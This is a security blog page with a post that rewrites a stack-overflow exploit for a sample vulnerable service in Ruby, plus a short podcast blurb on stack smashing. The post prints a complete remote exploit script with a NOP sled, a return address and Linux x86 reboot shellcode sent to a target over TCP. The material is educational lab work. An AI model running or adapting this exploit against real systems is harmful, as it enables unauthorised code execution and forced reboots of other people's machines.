Remote Exploit Development in Ruby

This Friday we are getting back into the trenches at the DC405. We have a talk coming up on remote exploitation of stack-based overflows that will be presented by ri0t.

So, I've been checking out the write-up by Preddy regarding the service. It's a nice walk-through on exploiting an example vulnerable service using both C and Perl. This is informative, I had to adjust my payload size (no biggie) and do a #include <string.h>, but overall a solid example without errors.

Exploits written in C are fairly common. Exploits written in Perl aren't rare. Exploits written using Ruby are like unicorns...they probably exist, but you never see one (at least where I'm keeping up with them). At any rate, I decided to look into rewriting the example exploit into Ruby and scratching the surface concerning Ruby sockets. It turns out that this is an extremely simple thing to do.

 
#!/usr/bin/ruby
# http://www.calculateddecision.com
 
require 'socket'
port = 7500
 
victim=ARGV[0]
nop = "\x90"
sled=nop*240
 
#This will probably be different for you
eip = "\xa8\xf9\xff\xbf"
 
#20 byte reboot shellcode Linux x86 Thanks to izik <izik@tty64.org>
shellcode="\x6a\x58"+
 
"\x58"+
"\xbb\xad\xde\xe1\xfe"+
"\xb9\x69\x19\x12\x28"+
"\xba\x67\x45\x23\x01"+
"\xcd\x80"
 
 payload=sled<<shellcode<<eip

if (ARGV.length<1)#Brief usage
puts "You have to give me a target"
else
mysocket=TCPSocket::new(victim,port)
mysocket.send(payload,0)
mysocket::close
 
end

As you can see, the TCPSocket constructor only requires an endpoint and a port. What's nice is that you can actually throw a domain name and it will resolve it. I half wondered if the hex bytes would need to be encoded or anything, but this is also handled for us without issue.

Looking at Preddy's perl example, these two forms don't really differ all that much and in fact, I'm not entirely sure that there isn't a simpler socket constructor available in perl (if nothing else CPAN). Even so, Ruby does IMHO offer a more inviting grammar.

You can download my send_overflow.rb here.

Notes:
xWinGs wrote a local ENV variable example

Posted in Programming, Security | 2 Comments »

Getting to Know Stack Smashing

In this episode of The Decision, I cover some of the issues that people run into as they start experimenting and exploring stack-based buffer overflows on Linux. Stack smashing is an interesting and rewarding exercise for security enthusiasts. It perfectly illustrates the idea of what can go wrong when trusting user input.

Hopefully with a handful of tips on the "gotchas" we can make it a bit less frustrating at the start. Read the rest of this entry »

 

 Issues With Stack Smashing [36:03m]: Play Now | Play in Popup | Download (157)

Posted in Podcast | No Comments »